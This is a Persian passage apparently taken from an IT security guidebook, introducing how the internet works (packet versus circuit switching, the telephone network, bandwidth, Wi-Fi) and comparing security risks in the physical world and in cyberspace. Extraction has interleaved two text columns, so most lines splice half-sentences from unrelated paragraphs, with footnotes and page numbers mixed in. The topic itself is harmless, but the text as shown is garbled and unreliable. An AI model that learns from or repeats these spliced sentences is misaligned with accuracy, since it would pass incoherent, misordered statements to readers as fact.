ﻣﻲﺷﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﻢ ﺑﻬﺘﺮ ﺩﺭﻙ ﻣﻲﺷﻮﻧﺪ.
ﺍﻳﻨﺘﺮﻧــﺖ ﻏﻴﺮﻣﺘﻤﺮﻛــﺰ ﺍﺳــﺖ ﻭ ﺩﺭ ﺁﻥ ﻫــﻴﭻ ﺳﻴــﺴﺘﻢ ﻣﺮﻛــﺰﻱ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﺳﺎﺱ ﻣﺪﻟﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﺭ ﻣـﻲ ﻛﻨـﺪ ﻛـﻪ
ﺍﺭﺗﺒﺎﻃﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﻫﻤﻴﻨﻜﻪ ﺷـﻤﺎ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺍﺻـﻠﻲ ﺁﻥ Packet Switchingﻧﺎﻡ ﺩﺍﺭﺩ .ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ
ﻧﻈﻴﺮ TCP/IPﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷـﺒﻜﻪ ﺧـﻮﺩ ﺭﺍ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻋﺒﻮﺭ ﻣﻲ ﻛﻨﺪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﺩﺍﺩﻩ ﺷﻜـﺴﺘﻪ
ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ. ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺷـﺪﻩ ﻭ ﻫـﺮ ﻛـﺪﺍﻡ ﺑـﺼﻮﺭﺕ
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻫﻤﻪﺟـﺎ ﺭﺍﻳـﺞ ﺍﺳـﺖ ﻭ ﻣﻮﺍﻧـﻊ ﻭﺭﻭﺩ ﺑـﻪ ﺁﻥ ﺍﻧـﺪﻙ ﻣﺴﺘﻘﻞ ﺩﺭ ﺷﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻭ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﺩﺭ ﻣﻘـﺼﺪ ﻣﺠـﺪﺩﹰﺍ
٤٠
ﻫﺴﺘﻨﺪ .ﻣﻘﺪﺍﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ )ﺳﺮﻋﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑـﺎ ﺁﻥ ﺳﺮﻫﻢﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ )ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ( .ﺍﻳـﻦ
ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴـﺪ( ﻧﻴﺰ ﺑﻪ ﻇﺮﻓﻴﺖ ﺣﻤـﻞ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ ،ﺍﺗـﺼﺎﻻﺕ ﺭﻭﺵ ﺍﻧﺘﻘـﺎﻝ ﺩﺭ ﻧﻘﻄـﺔ ﻣﻘﺎﺑـﻞ - Circuit Switchingﻛـﻪ
ﻓﻴﺒﺮﻱ ﻳﺎ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﻭﺍﻗﻊ ﺩﺭ ﻣـﺴﻴﺮ ﺍﻧﺘﻘـﺎﻝ ﺑـﺴﺘﮕﻲ PSTNﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ -ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺑـﻪ
ﺩﺍﺭﺩ .ﺩﺭ ﺷﺎﻫﺮﺍﻩ ﺁﻥ ﻃﻴﻔﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛﻤﻴـﺎﺏ ﻭﺟـﻮﺩ ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻳﻚ ﻣﺪﺍﺭ ﻭﺍﺣﺪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﻟـﺬﺍ
ﻧﺪﺍﺭﻧﺪ .ﻫﺮﺟﺎ ﻛـﻪ ﺍﺯ ﻃﻴـﻒ ﺭﺍﺩﻳـﻮﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﮔـﺮﺩﺩ -ﻣﺎﻧﻨـﺪ ﺩﺭ ﺁﻥ ﺣﺠﻢ ﺻﺪﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻳﺎﻓﺘﻪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﻣﻬﻢ ﻧﻴﺴﺖ.
ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ) ٤١(WLANsﻛﻪ ﻣﻌﻤـﻮ ﹰ
ﺍﻳﻨﺘﺮﻧﺖ ﺭﺳﺎﻧﻪﺍﻱ ﻧﺎﺩﺍﻥ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻛـﻪ ﻣـﻲﺩﺍﻧـﺪ
Wi-Fiﺍﺯ ﺁﻧﻬﺎ ﻧﺎﻡ ﺑﺮﺩﻩ ﻣﻲﺷﻮﺩ -ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺍﺯ ﻳﻚ ﻣﺒﺪﺃ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﻪ
ﻳﻚ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻛﻲ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ ﻛـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺳـﺎﺩﻩ ٣٧
ﻳﻚ ﻣﻘﺼﺪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺮﺳﺎﻧﺪ .ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﻣﻲﻛﻨﺪ. ﺩﺭ ﺍﻧﺘﻬﺎ ﻭ ﺩﺭ ﻟﺒﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻮﺳﻂ ﻭﺍﻗﻊ ﺩﺭ ﺑﺨـﺸﻬﺎﻳﻲ ﺍﺯ ﺩﻧﻴـﺎ ﻛـﻪ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻋﻮﺽ ﺩﺭ PSTNﺍﺳﺎﺱ ﻛﺎﺭ ﺷـﺒﻜﻪ "ﻫﻮﺷـﻤﻨﺪﻱ"
ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺤﻠﻲ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻧـﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺗﻤـﺎﻡ ﺍﺳﺖ ﻭ ﺍﺑـﺰﺍﺭ ﻛـﺎﺭﺑﺮ ﺩﺭ ﻧﻘـﺎﻁ ﺍﻧﺘﻬـﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩ ﺍﻧـﺪﻛﻲ ﺑـﺮﺍﻱ
ﻣﻲﺷﻮﺩ .ﻗﻴﻤﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔـﻦ ﻭ ﺻﺤﺒﺖﻛﺮﺩﻥ ﻳﺎ ﮔﻮﺵﺩﺍﺩﻥ ﺩﺍﺭﻧﺪ.
ﻛﺎﻓﻲﻧﺖ ﻭ ﺩﻳﮕﺮ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑﺴﻴﺎﺭ
ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﺍﺳﺖ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ
ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺩﺭﺻـﺪ
ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺮﺯﻫـﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ
ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺮﺩﻡ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﻣﻲﺑﺎﺷﺪ.
ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻭﻳﮋﮔـﻲ ﺑـﺎﺭﺯﺗﺮﻳﻦ ﻭ
ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻊ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﻣﺆﻟﻒ ﻭ ﻧﺎﺷﺮ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻩ ﺍﺳـﺖ؛ ﺟﺎﻟﺒﺘﺮﻳﻦ ﺧﺼﻮﺻﻴﺖ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﺍﺭﺗﺒـﺎﻁ ﭼﻨـﺪﺍﻧﻲ ﺑـﻪ
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺎﺷـﺮ ﺑﺎﺷـﻴﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺧـﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ .ﺷﺒﻜﺔ PSTNﻧﻴﺰ ﺟﻬﺎﻧﻲ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺭﻭﺷـﻬﺎﻱ
ﺷﺒﻜﻪﺍﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﻛﺎﻓﻴـﺴﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺗﻠﻔﻨﻲ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺍﻳﻨﺘﺮﻧـﺖ
ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺑـﺎﺭﺓ ﻼ ﻛﺎﺭﺑﺮ ﺗﻠﻔﻦ ﻣﻲﺩﺍﻧﺪ ﻛﻪ ﺑـﺎ ﻳـﻚ ﻛـﺸﻮﺭ ﺧـﺎﺭﺟﻲ ﻧﻴﺴﺖ ﻭ ﻣﺜ ﹰ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴـﺪ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﻛﻨﻴـﺪ ﻭ ﻫـﺮ ﻛـﺲ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺍﺳﺖ؛ ﺍﻣﺎ ﻭﻗﺘﻴﻜﻪ ﺑﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺳﺘﺮﺳـﻲ
ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺕ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻟﺰﻭﻣـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺪﺍﻧـﺪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺁﻥ ﺩﺭ
ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ.
38 Transmission Control Protocol/Internet
Protocol
39 Internet Engineering Task Force
40 Bandwidth 36 Public Switched Telephone Network
41 Wireless Local Area Networks 37 Internet Services
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٦
ﻣﻮﺿﻮﻋﺎﺕ ﻣﻄﺮﺡ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺟﺎﻧﺐ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﻭ ﺍﺯ ﺁﻥ ﺧـﺪﻣﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﻛـﺎﺭﺑﺮﺍﻥ ﻗﺎﺑـﻞ ﻛﻨﺘـﺮﻝ ﻭ ﺷـﻨﻮﺩ
ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧﻪ ،ﺷﺒﻜﻪ ﻭ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻤﺎﻧﻨـﺪ
ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻫﺴﺘﻨﺪ ،ﻭﻟﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺭﻭﺍﻟﻬـﺎﻱ
ﻛﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺭﺳـﺎﻟﻴﺘﺎﻥ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺷـﻨﻮﺩ
ﻼ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺑﻬﺎﻱﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﻣﺜ ﹰ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻳﺎ ﺧﻴﺮ.
ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻳﺎ ﺧـﺪﻣﺎﺕ ﺭﺍ ﻓـﺮﺍﻫﻢ
ﻣﻲﺁﻭﺭﻧﺪ ،ﺑﻪ ﺟﺎﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﻳـﺎ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺩﺍﺭﺍﻱ ﺑﻌﻼﻭﻩ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ
ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ٤٢ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ ٤٣ﻫـﺴﺘﻴﻢ ﻭ ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺧـﺎﺭﺟﻲ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ
ﭘﺎﻛﺘﻬﺎﻱ ﺩﺭﺑﺴﺘﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺩﺍﺩﺓ ﺍﻧﺘﻘـﺎﻟﻲ ﻼ ﺍﺯ ISPﺧـﻮﺩ ﺑﺨﻮﺍﻫﻴـﺪ ﻛـﻪ ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ -ﻣـﺜ ﹰ
ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ،ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺎﻣﻬﺎﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺧﻮﺩﺗـﺎﻥ ﺗـﺪﻭﻳﻦ
ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﺪ. ﻣﻲﻛﻨﻴﺪ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﺪ.
ﺩﺭ ﻣﻘﺎﻳﺴﺔ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺎ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺗﺨﻠﻔـﺎﺕ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﻌﺎﻣﻠﻲ ﺍﺳﺖ؛ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﻭ ﺑـﺎ
ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺒﻴﻨـﻴﻢ .ﺩﺭ ﺳﺮﻋﺖ ﭼﻨﺪﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ،ﻳﺎ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭﻱ
ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ﻭ ﻳـﺎ ﺍﻣـﻀﺎﻫﺎﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺍﺯ
ﺟﻌﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻫﺮ ﺩﻭ ﻓﻀﺎ ﺍﻣﻜﺎﻥ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﺁﻧﺠﺎ ﻛﻪ ﺯﻣﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑـﺮﺧﻂ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﻣﻴـﺰﺍﻥ
ﻏﻠﻂ ﻳﺎ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻫﻤﭽﻨـﻴﻦ ﺍﻣﻜـﺎﻥ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﺩﺍﺭﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳـﺦ
ﺑـﻪ ﺍﺷـﺘﺒﺎﻩ ﺍﻧــﺪﺍﺧﺘﻦ ﺍﺷــﺨﺎﺹ ﺑـﺎ ﺍﻃﻼﻋــﺎﺕ -ﭼــﻪ ﺑــﺼﻮﺭﺕ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻛﻤﻲ ﻃﻮﻝ ﺑﻜﺸﺪ.
ﺗﺼﺎﺩﻓﻲ ﻭ ﭼﻪ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ -ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺳﺎﺱ ﺁﻥ ﺑﺮ
ﻧﺘــﻮﺍﻥ ﺗﻌﻴــﻴﻦ ﻛــﺮﺩ ﻛــﻪ ﭼــﻪ ﺍﻃﻼﻋــﺎﺗﻲ ﻣﻬــﻢ ﻭ ﻗﺎﺑــﻞ ﺗﺄﻳﻴــﺪ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻫﻤﻜﺎﺭ ﻭ ﻧﺴﺒﺘﹰﺎ ﻣـﺸﺎﺑﻪ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ
ﻫﺴﺘﻨﺪ ٤٤.ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺭ ﻫـﺮ ﺩﻭ ﻓـﻀﺎ ﺍﻣﻜـﺎﻥ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷﺖ ﻭ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻄﻤﺌﻦ،
ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺻـﺪ ﺩﺭ ﺁﻥ ﺑﻪ ﻫﻤﻪ ﺍﻋﺘﻤﺎﺩ ﻣـﻲﺷـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. ﺍﻳﻨﺘﺮﻧــﺖ ﺭﺍ ﺑــﻪ ﺷــﻤﺎ ﺷﻨﺎﺳــﺎﻧﺪﻩ ﻭ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ
ﺍﻣﺎ ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺷﺒﺎﻫﺘﻬﺎ ﺳﻪ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ ﻣﻴـﺎﻥ ﺍﻳـﻦ ﺩﻭ ﻓـﻀﺎ ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑــﻪ ﺷــﻤﺎ ﺩﺭ ﻛــﺎﻫﺶ
ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ: ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﺍﻭﻝ :ﻫﺮ ﻧﻮﻉ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﻓـﻮﻕ ﺗـﺎﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺫﻫـﻦ ﺧـﻮﺩ
ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ؛ ﻳﻌﻨﻲ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺁﮔـﺎﻩ ﺷـﻮﻳﺪ ﭼـﻪ ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻧـﻮﻉ ﻓﻌﺎﻟﻴـﺖ
ﺍﺗﻔﺎﻗﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺷﻤﺎ ﺍﻓﺘﺎﺩﻩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﺑـﺮﺍﻱ ﻣﺠﺎﺯ ﺍﺳﺖ ﻭ ﭼﻴﺰﻱ ﺩﺭ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺖ ﻧـﺪﺍﺭﺩ ﻭ ﺗﺤـﺖ ﻛﻨﺘـﺮﻝ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻳـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ .ﺍﻟﺒﺘـﻪ ﻧﻴــﺴﺖ .ﺍﻳــﻦ ﻓــﻀﺎﻱ ﺑــﺎﺯ ﺑﺨــﻮﺑﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﭘﮋﻭﻫــﺸﻲ ﻭ
